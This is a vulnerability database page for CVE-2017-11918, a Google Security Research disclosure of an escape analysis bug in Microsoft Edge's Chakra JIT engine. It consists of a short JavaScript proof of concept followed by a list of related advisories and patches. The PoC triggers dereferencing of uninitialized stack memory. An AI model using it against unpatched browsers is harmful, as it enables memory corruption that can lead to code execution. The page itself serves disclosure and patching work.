Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormGoogle Security ResearchPACKETSTORM:145787
HistoryJan 10, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT Escape Analysis Bug

2018-01-1000:00:00
Google Security Research
packetstormsecurity.com
62

0.949 High

EPSS

Percentile

99.1%

JSON
`Microsoft Edge: Chakra: JIT: Escape analysis bug   
  
CVE-2017-11918  
  
  
Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>  
  
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.  
  
PoC:  
function opt() {  
let tmp = [];  
tmp[0] = tmp;  
return tmp[0];  
}  
  
function main() {  
for (let i = 0; i < 0x1000; i++) {  
opt();  
}  
  
print(opt()); // deref uninitialized stack pointers!  
}  
  
main();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Related

symantec 1
mscve 1
zdt 1
veracode 14
mskb 5
prion 19
osv 22
github 9
cve 19
nessus 5
openvas 5
kaspersky 1
talosblog 1
trendmicroblog 1
symantec
symantec
Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability
2017-12-12 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-12-12 08:00:00
zdt
zdt
Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit
2018-01-09 00:00:00
veracode
veracode
Privilege Escalation
2018-07-05 05:13:18
Remote Code Execution (RCE)
2018-07-05 02:45:16
Remote Code Execution (RCE)
2018-07-05 03:39:12
mskb
mskb
December 12, 2017—KB4053581 (OS Build 10240.17709)
2017-12-12 08:00:00
December 12, 2017—KB4053579 (OS Build 14393.1944)
2017-12-12 08:00:00
December 12, 2017—KB4053580 (OS Build 15063.786)
2017-12-12 08:00:00
prion
prion
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
osv
osv
CVE-2017-11910
2017-12-12 21:29:01
CVE-2017-11893
2017-12-12 21:29:01
ChakraCore RCE Vulnerability
2022-05-14 04:03:59
github
github
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:51
ChakraCore RCE Vulnerability
2022-05-17 00:11:58
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:50
cve
cve
CVE-2017-11908
2017-12-12 21:29:00
CVE-2017-11894
2017-12-12 21:29:00
CVE-2017-11901
2017-12-12 21:29:00
nessus
nessus
KB4053581: Windows 10 December 2017 Security Update
2017-12-12 00:00:00
KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
2017-12-12 00:00:00
KB4053578: Windows 10 Version 1511 December 2017 Security Update
2017-12-12 00:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4053581)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053580)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053579)
2017-12-13 00:00:00
kaspersky
kaspersky
KLA11158 Multiple vunlerabilities in Microsoft Browsers
2017-12-12 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - December 2017
2017-12-12 15:32:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of December 11, 2017
2017-12-15 16:06:45

0.949 High

EPSS

Percentile

99.1%

JSON
Related for PACKETSTORM:145787
symantec1mscve1zdt1veracode14mskb5prion19osv22github9cve19nessus5openvas5kaspersky1talosblog1trendmicroblog1